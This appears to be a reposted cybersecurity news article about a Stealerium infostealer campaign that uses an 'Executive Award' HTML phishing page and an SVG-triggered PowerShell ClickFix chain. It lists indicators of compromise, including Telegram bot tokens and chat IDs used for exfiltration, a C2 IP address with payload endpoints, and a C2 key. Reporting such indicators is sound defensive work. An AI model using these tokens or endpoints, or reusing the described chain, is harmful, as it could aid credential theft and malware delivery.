By rssfeeds-admin 
Security analysts warn that the attack combines a polished HTML phishing page with a follow-up PowerShell execution chain that installs the Stealerium infostealer.
The campaign begins with a phishing email containing a well-crafted HTML attachment titled Virtual-Gift-Card-Claim.html.
When opened, the page displays a realistic company-branded form prompting users to verify their details to claim an award.
Once credentials are entered, the data is exfiltrated to a Telegram command-and-control (C2) bot using API token 6926474815:AAHMa86FvgJGailNJ2EzmIgA8hk_nzb5KvA and chat ID 875787587.
From Phishing to PowerShell Infection
The second stage of the attack involves a malicious image file, account-verification-form.svg, embedded with obfuscated JavaScript.
When the SVG is executed, it triggers a PowerShell-based ClickFix chain, a technique that leverages Windows’ native scripting and execution flow to bypass traditional security controls.
The script fetches additional payloads from a remote server hosted at 31.57.147.77:6464, retrieving multiple stages via endpoints such as /getcmd, /gethta, /getexe, and /getdll.
This chain eventually drops a Stealerium dynamic-link library (DLL), identified by hashes 602ac35cc1e49320493eb54bde62b760 and 88feadbb2f9548d3c0cb9c6519bcea476acf9ac2a3eeccde5655457cbba29db4.
Once executed, Stealerium collects browser data, cryptocurrency wallets, and saved credentials before transmitting them via a second Telegram bot (6926474815:AAFx9tLAnf5OAVQZp2teS3G2_6T1wCP67xM, chat ID -4224073938).
Investigators link the command server to the same IP address used for the phishing stage, using a distinctive C2 key labeled “StealeriumC2SecretKey123.”
The malware uses AES encryption for its outbound communications, adding a layer of protection against network-based detection.
Multi-Stage Loaders on the Rise
The “Executive Award” campaign is another example of how threat actors blend social engineering with multi-stage loaders to amplify attack effectiveness.
By luring victims with enticing corporate-themed incentives and chaining PowerShell via ClickFix exploitation, attackers evade email filters and endpoint defenses.
Indicators of compromise (IoCs) include the malicious HTML and SVG file hashes, the Stealerium DLL signatures, and all C2-related network artifacts tied to 31.57.147.77:6464.
Security teams are urged to block these indicators, monitor PowerShell network activity, and restrict outbound Telegram API connections to prevent data exfiltration.
Early detections suggest that this campaign targets enterprise users, focusing on those with finance or administrative roles, where stolen credentials may grant access to sensitive corporate data or payment systems.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post New Stealerium Malware Campaign Masquerades as “Executive Award” Using ClickFix appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.